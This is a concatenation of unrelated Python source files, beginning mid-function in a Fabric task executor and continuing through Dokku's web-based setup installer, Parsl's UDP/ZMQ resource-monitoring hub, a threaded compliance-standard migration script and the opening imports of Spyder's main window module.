jobs = JobQueue(pool_size, queue, role_limits=role_limits,
debug=state.output.debug)
if state.output.debug:
jobs._debug = True
# Call on host list
if my_env['all_hosts']:
# Attempt to cycle on hosts, skipping if needed
for host in my_env['all_hosts']:
try:
results[host] = _execute(
task, host, my_env, args, new_kwargs, jobs, queue,
multiprocessing
)
except NetworkError, e:
results[host] = e
# Backwards compat test re: whether to use an exception or
# abort
if not state.env.use_exceptions_for['network']:
func = warn if state.env.skip_bad_hosts else abort
error(e.message, func=func, exception=e.wrapped)
else:
raise
# If requested, clear out connections here and not just at the end.
if state.env.eagerly_disconnect:
disconnect_all()
# If running in parallel, block until job queue is emptied
if jobs:
err = "One or more hosts failed while executing task '%s'" % (
my_env['command']
)
jobs.close()
# Abort if any children did not exit cleanly (fail-fast).
# This prevents Fabric from continuing on to any other tasks.
# Otherwise, pull in results from the child run.
ran_jobs = jobs.run()
for name, d in ran_jobs.iteritems():
if d['exit_code'] != 0:
if isinstance(d['results'], BaseException):
error(err, exception=d['results'])
else:
error(err)
results[name] = d['results']
# Or just run once for local-only
else:
with settings(**my_env):
results['<local-only>'] = task.run(*args, **new_kwargs)
# Return what we can from the inner task executions
# Return what we can from the inner task executions
return results
|
dokku-installer.py
|
#!/usr/bin/env python2.7
import cgi
import json
import os
import re
import SimpleHTTPServer
import SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.11.4'
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = subprocess.check_output(command, shell=True)
if ':' in hostname:
hostname = ''
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', '/root/.ssh/authorized_keys')
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = subprocess.check_output(command, shell=True).strip().split("\n")
except subprocess.CalledProcessError:
pass
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_dir = os.getenv('NGINX_DIR', '/etc/nginx/conf.d')
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_dir):
with open('{0}/dokku-installer.conf'.format(nginx_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f /etc/nginx/sites-enabled/*', shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.wfile.write(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
vhost_enable = 'false'
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
if 'vhost' in params and params['vhost'].value == 'true':
vhost_enable = 'true'
with open('{0}/VHOST'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
else:
try:
os.remove('{0}/VHOST'.format(dokku_root))
except OSError:
pass
with open('{0}/HOSTNAME'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
for (index, key) in enumerate(params['keys'].value.splitlines(), 1):
user = 'admin'
if self.admin_user_exists() is not None:
user = 'web-admin'
if self.web_admin_user_exists() is not None:
index = int(self.web_admin_user_exists()) + 1
elif self.web_admin_user_exists() is None:
index = 1
elif self.admin_user_exists() is None:
pass
else:
index = int(self.admin_user_exists()) + 1
user = user + str(index)
command = ['sshcommand', 'acl-add', 'dokku', user]
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
proc.stdin.write(key)
proc.stdin.close()
proc.wait()
set_debconf_selection('boolean', 'skip_key_file', 'true')
set_debconf_selection('boolean', 'vhost_enable', vhost_enable)
set_debconf_selection('boolean', 'web_config', 'false')
set_debconf_selection('string', 'hostname', params['hostname'].value)
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
self.send_response(200)
self.end_headers()
self.wfile.write(json.dumps({'status': 'ok'}))
def web_admin_user_exists(self):
return self.user_exists('web-admin(\d+)')
def admin_user_exists(self):
return self.user_exists('admin(\d+)')
def user_exists(self, name):
command = 'dokku ssh-keys:list'
pattern = re.compile(r'NAME="' + name + '"')
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
max_num = 0
exists = False
for line in proc.stdout:
m = pattern.search(line)
if m:
# User of the form `user` or `user#` exists
exists = True
max_num = max(max_num, m.group(1))
if exists:
return max_num
else:
return None
def set_debconf_selection(debconf_type, key, value):
found = False
with open('/etc/os-release', 'r') as f:
for line in f:
if 'debian' in line:
found = True
if not found:
return
ps = subprocess.Popen(['echo', 'dokku dokku/{0} {1} {2}'.format(
key, debconf_type, value
)], stdout=subprocess.PIPE)
try:
subprocess.check_output(['debconf-set-selections'], stdin=ps.stdout)
except subprocess.CalledProcessError:
pass
ps.wait()
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm /etc/nginx/conf.d/dokku-installer.conf && /etc/init.d/nginx stop && /etc/init.d/nginx start"
try:
subprocess.call(command, shell=True)
except:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && (stop dokku-installer || systemctl stop dokku-installer.service)"
try:
subprocess.call(command, shell=True)
except:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print "Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port)
httpd.serve_forever()
PAGE = """
<html>
<head>
<title>Dokku Setup</title>
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<div class="container" style="width: 640px;">
<form id="form" role="form">
<h1>Dokku Setup <small>{VERSION}</small></h1>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Admin Access</small></h3>
<label for="key">Public Key</label><br />
<textarea class="form-control" name="keys" rows="7" id="key">{ADMIN_KEYS}</textarea>
</div>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Hostname Configuration</small></h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" />
</div>
<div class="checkbox">
<label><input id="vhost" name="vhost" type="checkbox" value="true"> Use <abbr title="Nginx will be run on port 80 and backend to your apps based on hostname">virtualhost naming</abbr> for apps</label>
</div>
<p>Your app URLs will look like:</p>
<pre id="example">http://hostname:port</pre>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span style="padding-left: 20px;" id="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
function setup() {
if ($.trim($("#key").val()) == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($.trim($("#hostname").val()) == "") {
alert("Your hostname cannot be blank.")
return
}
data = $("#form").serialize()
$("input,textarea,button").prop("disabled", true);
$.post('/setup', data)
.done(function() {
$("#result").html("Success!")
window.location.href = "http://dokku.viewdocs.io/dokku~{VERSION}/deployment/application-deployment/";
})
.fail(function(data) {
$("#result").html("Something went wrong...")
$("#error-output").html(data.responseText)
});
}
function update() {
if ($("#vhost").is(":checked") && $("#hostname").val().match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").prop('checked', false);
}
if ($("#vhost").is(':checked')) {
$("#example").html("http://<app-name>."+$("#hostname").val())
} else {
$("#example").html("http://"+$("#hostname").val()+":<app-port>")
}
}
$("#vhost").change(update);
$("#hostname").change(update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
monitoring.py
|
import os
import socket
import pickle
import logging
import time
import datetime
import zmq
import queue
from multiprocessing import Process, Queue
from parsl.utils import RepresentationMixin
from parsl.monitoring.message_type import MessageType
from typing import Optional
try:
from parsl.monitoring.db_manager import dbm_starter
except Exception as e:
_db_manager_excepts = e # type: Optional[Exception]
else:
_db_manager_excepts = None
def start_file_logger(filename, name='monitoring', level=logging.DEBUG, format_string=None):
"""Add a stream log handler.
Parameters
---------
filename: string
Name of the file to write logs to. Required.
name: string
Logger name. Default="parsl.executors.interchange"
level: logging.LEVEL
Set the logging level. Default=logging.DEBUG
- format_string (string): Set the format string
format_string: string
Format string to use.
Returns
-------
None.
"""
if format_string is None:
format_string = "%(asctime)s.%(msecs)03d %(name)s:%(lineno)d [%(levelname)s] %(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
handler = logging.FileHandler(filename)
handler.setLevel(level)
formatter = logging.Formatter(format_string, datefmt='%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
class UDPRadio(object):
def __init__(self, monitoring_url, source_id=None, timeout=10):
"""
Parameters
----------
monitoring_url : str
URL of the form <scheme>://<IP>:<PORT>
message : py obj
Python object to send, this will be pickled
source_id : str
String identifier of the source
timeout : int
timeout, default=10s
"""
self.monitoring_url = monitoring_url
self.sock_timeout = timeout
self.source_id = source_id
try:
self.scheme, self.ip, port = (x.strip('/') for x in monitoring_url.split(':'))
self.port = int(port)
except Exception:
raise Exception("Failed to parse monitoring url: {}".format(monitoring_url))
self.sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP) # UDP
self.sock.settimeout(self.sock_timeout)
def send(self, message_type, task_id, message):
""" Sends a message to the UDP receiver
Parameter
---------
message_type: monitoring.MessageType (enum)
In this case message type is RESOURCE_INFO most often
task_id: int
Task identifier of the task for which resource monitoring is being reported
message: object
Arbitrary pickle-able object that is to be sent
Returns:
# bytes sent
"""
x = 0
try:
buffer = pickle.dumps((self.source_id, # Identifier for manager
int(time.time()), # epoch timestamp
message_type,
message))
except Exception:
logging.exception("Exception during pickling", exc_info=True)
return
try:
x = self.sock.sendto(buffer, (self.ip, self.port))
except socket.timeout:
logging.error("Could not send message within timeout limit")
return False
return x
def __del__(self):
self.sock.close()
class MonitoringHub(RepresentationMixin):
def __init__(self,
hub_address,
hub_port=None,
hub_port_range=(55050, 56000),
client_address="127.0.0.1",
client_port_range=(55000, 56000),
workflow_name=None,
workflow_version=None,
logging_endpoint='sqlite:///monitoring.db',
logdir=None,
logging_level=logging.INFO,
resource_monitoring_enabled=True,
resource_monitoring_interval=30): # in seconds
"""
Parameters
----------
hub_address : str
The ip address at which the workers will be able to reach the Hub. Default: "127.0.0.1"
hub_port : int
The specific port at which workers will be able to reach the Hub via UDP. Default: None
hub_port_range : tuple(int, int)
The MonitoringHub picks ports at random from the range which will be used by Hub.
This is overridden when the hub_port option is set. Defauls: (55050, 56000)
client_address : str
The ip address at which the dfk will be able to reach Hub. Default: "127.0.0.1"
client_port_range : tuple(int, int)
The MonitoringHub picks ports at random from the range which will be used by Hub.
Defauls: (55050, 56000)
workflow_name : str
The name for the workflow. Default to the name of the parsl script
workflow_version : str
The version of the workflow. Default to the beginning datetime of the parsl script
logging_endpoint : str
The database connection url for monitoring to log the information.
These URLs follow RFC-1738, and can include username, password, hostname, database name.
Default: 'sqlite:///monitoring.db'
logdir : str
Parsl log directory paths. Logs and temp files go here. Default: '.'
logging_level : int
Logging level as defined in the logging module. Default: logging.INFO (20)
resource_monitoring_enabled : boolean
Set this field to True to enable logging the info of resource usage of each task. Default: True
resource_monitoring_interval : int
The time interval at which the monitoring records the resource usage of each task. Default: 30 seconds
"""
self.logger = None
self._dfk_channel = None
if _db_manager_excepts:
raise(_db_manager_excepts)
self.client_address = client_address
self.client_port_range = client_port_range
self.hub_address = hub_address
self.hub_port = hub_port
self.hub_port_range = hub_port_range
self.logging_endpoint = logging_endpoint
self.logdir = logdir
self.logging_level = logging_level
self.workflow_name = workflow_name
self.workflow_version = workflow_version
self.resource_monitoring_enabled = resource_monitoring_enabled
self.resource_monitoring_interval = resource_monitoring_interval
def start(self, run_id):
if self.logdir is None:
self.logdir = "."
try:
os.makedirs(self.logdir)
except FileExistsError:
pass
# Initialize the ZMQ pipe to the Parsl Client
self.logger = start_file_logger("{}/monitoring_hub.log".format(self.logdir),
name="monitoring_hub",
level=self.logging_level)
self.logger.info("Monitoring Hub initialized")
self.logger.debug("Initializing ZMQ Pipes to client")
self.monitoring_hub_active = True
self._context = zmq.Context()
self._dfk_channel = self._context.socket(zmq.DEALER)
self._dfk_channel.set_hwm(0)
self.dfk_port = self._dfk_channel.bind_to_random_port("tcp://{}".format(self.client_address),
min_port=self.client_port_range[0],
max_port=self.client_port_range[1])
comm_q = Queue(maxsize=10)
self.stop_q = Queue(maxsize=10)
self.priority_msgs = Queue()
self.resource_msgs = Queue()
self.node_msgs = Queue()
self.queue_proc = Process(target=hub_starter,
args=(comm_q, self.priority_msgs, self.node_msgs, self.resource_msgs, self.stop_q),
kwargs={"hub_address": self.hub_address,
"hub_port": self.hub_port,
"hub_port_range": self.hub_port_range,
"client_address": self.client_address,
"client_port": self.dfk_port,
"logdir": self.logdir,
"logging_level": self.logging_level,
"run_id": run_id
},
)
self.queue_proc.start()
self.dbm_proc = Process(target=dbm_starter,
args=(self.priority_msgs, self.node_msgs, self.resource_msgs,),
kwargs={"logdir": self.logdir,
"logging_level": self.logging_level,
"db_url": self.logging_endpoint,
},
)
self.dbm_proc.start()
try:
udp_dish_port, ic_port = comm_q.get(block=True, timeout=120)
except queue.Empty:
self.logger.error("Hub has not completed initialization in 120s. Aborting")
raise Exception("Hub failed to start")
self.monitoring_hub_url = "udp://{}:{}".format(self.hub_address, udp_dish_port)
return ic_port
def send(self, mtype, message):
self.logger.debug("Sending message {}, {}".format(mtype, message))
return self._dfk_channel.send_pyobj((mtype, message))
def close(self):
if self.logger:
self.logger.info("Terminating Monitoring Hub")
if self._dfk_channel and self.monitoring_hub_active:
self.monitoring_hub_active = False
self._dfk_channel.close()
self.logger.info("Waiting Hub to receive all messages and terminate")
try:
msg = self.stop_q.get()
self.logger.info("Received {} from Hub".format(msg))
except queue.Empty:
pass
self.logger.info("Terminating Hub")
self.queue_proc.terminate()
self.priority_msgs.put(("STOP", 0))
def __del__(self):
self.close()
@staticmethod
def monitor_wrapper(f, task_id, monitoring_hub_url, run_id, sleep_dur):
""" Internal
Wrap the Parsl app with a function that will call the monitor function and point it at the correct pid when the task begins.
"""
def wrapped(*args, **kwargs):
p = Process(target=monitor, args=(os.getpid(), task_id, monitoring_hub_url, run_id, sleep_dur))
p.start()
try:
return f(*args, **kwargs)
finally:
# There's a chance of zombification if the workers are killed by some signals
p.terminate()
p.join()
return wrapped
class Hub(object):
def __init__(self,
hub_address,
hub_port=None,
hub_port_range=(55050, 56000),
client_address="127.0.0.1",
client_port=None,
monitoring_hub_address="127.0.0.1",
logdir=".",
run_id=None,
logging_level=logging.DEBUG,
atexit_timeout=3 # in seconds
):
""" Initializes a monitoring configuration class.
Parameters
----------
hub_address : str
The ip address at which the workers will be able to reach the Hub. Default: "127.0.0.1"
hub_port : int
The specific port at which workers will be able to reach the Hub via UDP. Default: None
hub_port_range : tuple(int, int)
The MonitoringHub picks ports at random from the range which will be used by Hub.
This is overridden when the hub_port option is set. Defauls: (55050, 56000)
client_address : str
The ip address at which the dfk will be able to reach Hub. Default: "127.0.0.1"
client_port : tuple(int, int)
The port at which the dfk will be able to reach Hub. Defauls: None
logdir : str
Parsl log directory paths. Logs and temp files go here. Default: '.'
logging_level : int
Logging level as defined in the logging module. Default: logging.INFO (20)
atexit_timeout : float, optional
The amount of time in seconds to terminate the hub without receiving any messages, after the last dfk workflow message is received.
"""
try:
os.makedirs(logdir)
except FileExistsError:
pass
self.logger = start_file_logger("{}/hub.log".format(logdir),
name="hub",
level=logging_level)
self.logger.debug("Hub starting")
if not hub_port:
self.logger.critical("At this point the hub port must be set")
self.hub_port = hub_port
self.hub_address = hub_address
self.atexit_timeout = atexit_timeout
self.run_id = run_id
self.loop_freq = 10.0 # milliseconds
# Initialize the UDP socket
self.logger.debug("Intiializing the UDP socket on 0.0.0.0:{}".format(hub_port))
try:
self.sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP)
# We are trying to bind to all interfaces with 0.0.0.0
self.sock.bind(('0.0.0.0', hub_port))
self.sock.settimeout(self.loop_freq / 1000)
except OSError:
self.logger.critical("The port is already in use")
self.hub_port = -1
self._context = zmq.Context()
self.dfk_channel = self._context.socket(zmq.DEALER)
self.dfk_channel.set_hwm(0)
self.dfk_channel.RCVTIMEO = int(self.loop_freq) # in milliseconds
self.dfk_channel.connect("tcp://{}:{}".format(client_address, client_port))
self.ic_channel = self._context.socket(zmq.DEALER)
self.ic_channel.set_hwm(0)
self.ic_channel.RCVTIMEO = int(self.loop_freq) # in milliseconds
self.logger.debug("hub_address: {}. hub_port_range {}".format(hub_address, hub_port_range))
self.ic_port = self.ic_channel.bind_to_random_port("tcp://*",
min_port=hub_port_range[0],
max_port=hub_port_range[1])
def start(self, priority_msgs, node_msgs, resource_msgs, stop_q):
while True:
try:
data, addr = self.sock.recvfrom(2048)
msg = pickle.loads(data)
resource_msgs.put((msg, addr))
self.logger.debug("Got UDP Message from {}: {}".format(addr, msg))
except socket.timeout:
pass
try:
msg = self.dfk_channel.recv_pyobj()
self.logger.debug("Got ZMQ Message from DFK: {}".format(msg))
priority_msgs.put((msg, 0))
if msg[0].value == MessageType.WORKFLOW_INFO.value and 'python_version' not in msg[1]:
break
except zmq.Again:
pass
try:
msg = self.ic_channel.recv_pyobj()
msg[1]['run_id'] = self.run_id
msg = (msg[0], msg[1])
self.logger.debug("Got ZMQ Message from interchange: {}".format(msg))
node_msgs.put((msg, 0))
except zmq.Again:
pass
last_msg_received_time = time.time()
while time.time() - last_msg_received_time < self.atexit_timeout:
try:
data, addr = self.sock.recvfrom(2048)
msg = pickle.loads(data)
resource_msgs.put((msg, addr))
last_msg_received_time = time.time()
self.logger.debug("Got UDP Message from {}: {}".format(addr, msg))
except socket.timeout:
pass
stop_q.put("STOP")
def hub_starter(comm_q, priority_msgs, node_msgs, resource_msgs, stop_q, *args, **kwargs):
hub = Hub(*args, **kwargs)
comm_q.put((hub.hub_port, hub.ic_port))
hub.start(priority_msgs, node_msgs, resource_msgs, stop_q)
def monitor(pid, task_id, monitoring_hub_url, run_id, sleep_dur=10):
"""Internal
Monitors the Parsl task's resources by pointing psutil to the task's pid and watching it and its children.
"""
import psutil
import platform
import logging
import time
format_string = "%(asctime)s.%(msecs)03d %(name)s:%(lineno)d [%(levelname)s] %(message)s"
logging.basicConfig(filename='{logbase}/monitor.{task_id}.{pid}.log'.format(
logbase="/tmp", task_id=task_id, pid=pid), level=logging.DEBUG, format=format_string)
logging.debug("start of monitor")
radio = UDPRadio(monitoring_hub_url,
source_id=task_id)
# these values are simple to log. Other information is available in special formats such as memory below.
simple = ["cpu_num", 'cpu_percent', 'create_time', 'cwd', 'exe', 'memory_percent', 'nice', 'name', 'num_threads', 'pid', 'ppid', 'status', 'username']
# values that can be summed up to see total resources used by task process and its children
summable_values = ['cpu_percent', 'memory_percent', 'num_threads']
pm = psutil.Process(pid)
pm.cpu_percent()
first_msg = True
while True:
logging.debug("start of monitoring loop")
try:
d = {"psutil_process_" + str(k): v for k, v in pm.as_dict().items() if k in simple}
d["run_id"] = run_id
d["task_id"] = task_id
d['resource_monitoring_interval'] = sleep_dur
d['hostname'] = platform.node()
d['first_msg'] = first_msg
d['timestamp'] = datetime.datetime.now()
logging.debug("getting children")
children = pm.children(recursive=True)
logging.debug("got children")
d["psutil_cpu_count"] = psutil.cpu_count()
d['psutil_process_memory_virtual'] = pm.memory_info().vms
d['psutil_process_memory_resident'] = pm.memory_info().rss
d['psutil_process_time_user'] = pm.cpu_times().user
d['psutil_process_time_system'] = pm.cpu_times().system
d['psutil_process_children_count'] = len(children)
try:
d['psutil_process_disk_write'] = pm.io_counters().write_bytes
d['psutil_process_disk_read'] = pm.io_counters().read_bytes
except Exception:
# occassionally pid temp files that hold this information are unvailable to be read so set to zero
logging.exception("Exception reading IO counters for main process. Recorded IO usage may be incomplete", exc_info=True)
d['psutil_process_disk_write'] = 0
d['psutil_process_disk_read'] = 0
for child in children:
for k, v in child.as_dict(attrs=summable_values).items():
d['psutil_process_' + str(k)] += v
d['psutil_process_time_user'] += child.cpu_times().user
d['psutil_process_time_system'] += child.cpu_times().system
d['psutil_process_memory_virtual'] += child.memory_info().vms
d['psutil_process_memory_resident'] += child.memory_info().rss
try:
d['psutil_process_disk_write'] += child.io_counters().write_bytes
d['psutil_process_disk_read'] += child.io_counters().read_bytes
except Exception:
# occassionally pid temp files that hold this information are unvailable to be read so add zero
logging.exception("Exception reading IO counters for child {k}. Recorded IO usage may be incomplete".format(k=k), exc_info=True)
d['psutil_process_disk_write'] += 0
d['psutil_process_disk_read'] += 0
logging.debug("sending message")
radio.send(MessageType.TASK_INFO, task_id, d)
first_msg = False
except Exception:
logging.exception("Exception getting the resource usage. Not sending usage to Hub", exc_info=True)
logging.debug("sleeping")
time.sleep(sleep_dur)
|
cmp_migrate_thread.py
|
from compliance_standards import cmp_compare, cmp_get, cmp_add
from sdk.color_print import c_print
from tqdm import tqdm
import threading
def migrate(tenant_sessions: list, logger):
'''
Accepts a list of tenant session objects.
Gets a list of the top level compliance standards that are missing and migrates
the missing compliance standard and all its requirements and sections. Does not
search for and add missing requirements or sections. That is handled in the
sync module which does a much more time intensive nested search of all the
compliance data accross all tenants
'''
standards_added = []
requirements_added = []
sections_added = []
#Get complance standards from all tenants
tenant_compliance_standards_lists = []
for session in tenant_sessions:
tenant_compliance_standards_lists.append(cmp_get.get_compliance_standard_list(session, logger))
#Compare compliance standards
clone_compliance_standards_to_migrate = cmp_compare.get_compliance_stanadards_to_add(tenant_sessions, tenant_compliance_standards_lists, logger)
#Get all requirements and sections for each standard. This is a deep nested search and takes some time
clone_compliance_standards_data = []
for tenant in tqdm(clone_compliance_standards_to_migrate, desc='Getting Compliance Data', leave=False):
tenant_compliance = []
pool = []
tenant_threads = break_into_threads(tenant)
for tenant_thread in tenant_threads:
x = threading.Thread(target=get_cmp_info, args=(tenant_compliance, tenant_thread, tenant_sessions[0], logger))
pool.append(x)
x.start()
for index, thread in enumerate(pool):
thread.join()
logger.info(f'Thread: \'{index}\' done')
clone_compliance_standards_data.append(tenant_compliance)
#Migrate compliance standards. First migrate over the standards and translate the UUIDs.
#Then migrate over the requirements and translate the UUIDS. Finnally migrate the sections.
for index, tenant_standards in enumerate(clone_compliance_standards_data):
#Migrate compliance standards
added = 0
for standard in tenant_standards:
cmp_add.add_compliance_standard(tenant_sessions[index + 1], standard['standard'], logger)
added += 1
standards_added.append(added)
#Translate compliance IDs
clone_standards = cmp_get.get_compliance_standard_list(tenant_sessions[index + 1], logger)
for i in range(len(tenant_standards)):
name = tenant_standards[i]['standard']['name']
for j in range(len(clone_standards)):
if clone_standards[j]['name'] == name:
new_id = clone_standards[j]['id']
tenant_standards[i]['standard'].update(id=new_id)
break
#Migrate compliance requirements
added_reqs = 0
added_secs = 0
#Break tenant_standards into thread
tenant_standards_treads = break_into_threads(tenant_standards)
pool = []
for thread in tenant_standards_treads:
x = threading.Thread(target=add_cmp_thread, args=(thread, added_reqs, added_secs, tenant_sessions, index, logger))
pool.append(x)
x.start()
for index, thread in enumerate(pool):
thread.join()
logger.info(f'Thread: \'{index}\' done')
sections_added.append(added_secs)
requirements_added.append(added_reqs)
logger.info('Finished migrating Compliance Standards')
print()
return standards_added, requirements_added, sections_added
#==============================================================================
def add_cmp_thread(tenant_standards, added_reqs, added_secs, tenant_sessions, index, logger):
for index2, standard in enumerate(tenant_standards):
requirements = standard['requirements']
std_id = standard['standard']['id']
for requirement in requirements:
cmp_add.add_requirement_to_standard(tenant_sessions[index + 1], std_id, requirement['requirement'], logger)
added_reqs += 1
#Translate compliance IDs
clone_requirements = cmp_get.get_compliance_requirement_list(tenant_sessions[index+1], standard['standard'], logger)
for i in range(len(requirements)):
name = requirements[i]['requirement']['name']
for j in range(len(clone_requirements)):
if clone_requirements[j]['name'] == name:
new_id = clone_requirements[j]['id']
requirements[i]['requirement'].update(id=new_id)
break
#Update requirements list with the list that has the new ids - maybe not needed but easy to do
tenant_standards[index2].update(requirements=requirements)
#Migrate sections now that the requirement UUIDs have been updated
for requirement in requirements:
req_id = requirement['requirement']['id']
sections = requirement['sections']
for section in sections:
cmp_add.add_section_to_requirement(tenant_sessions[index+1], req_id, section, logger)
added_secs += 1
#==============================================================================
def get_cmp_info(tenant_compliance, tenant, session, logger):
for standard in tenant:
standard_dict = {}
requirements = []
requirements_data = cmp_get.get_compliance_requirement_list(session, standard, logger)
for requirement in requirements_data:
requirement_dict = {}
sections = cmp_get.get_compliance_sections_list(session, requirement, logger)
requirement_dict.update(requirement=requirement)
requirement_dict.update(sections=sections)
requirements.append(requirement_dict)
standard_dict.update(standard=standard)
standard_dict.update(requirements=requirements)
tenant_compliance.append(standard_dict)
#==============================================================================
#Break list into equal sized chunks for threading
def break_into_threads(list_to_break):
max_threads = 10
thread_size = len(list_to_break) // max_threads
if thread_size < 1:
thread_size = 1
if max_threads > len(list_to_break):
max_threads = len(list_to_break)
thread_list = []
for i in range(max_threads):
start = i * thread_size
end = start + thread_size
if i + 1 == max_threads:
items_for_thread = list_to_break[start:]
else:
items_for_thread = list_to_break[start:end]
thread_list.append(items_for_thread)
return thread_list
#==============================================================================
#Test code
if __name__ == '__main__':
from sdk import load_config
tenant_sessions = load_config.load_config_create_sessions()
migrate(tenant_sessions)
# tenant_compliance = [
# {
# 'standard': standard_dict,
# 'requirements': [
# {
# 'requirement': requirement_dict,
# 'sections': [
# section_dict
# ]
# }
# ]
# }
# ]
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import glob
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QIcon, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QMainWindow, QMenu,
QMessageBox, QShortcut, QStyleFactory, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app import tour
from spyder.app.utils import (create_splash_screen, delete_lsp_log_files,
qt_message_handler, set_links_color,
setup_logging, set_opengl_implementation, Spy)
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
get_safe_mode, is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.utils.image_path_manager import get_image_path
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
from spyder.app.solver import (
find_external_plugins, find_internal_plugins, solve_plugin_dependencies)
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
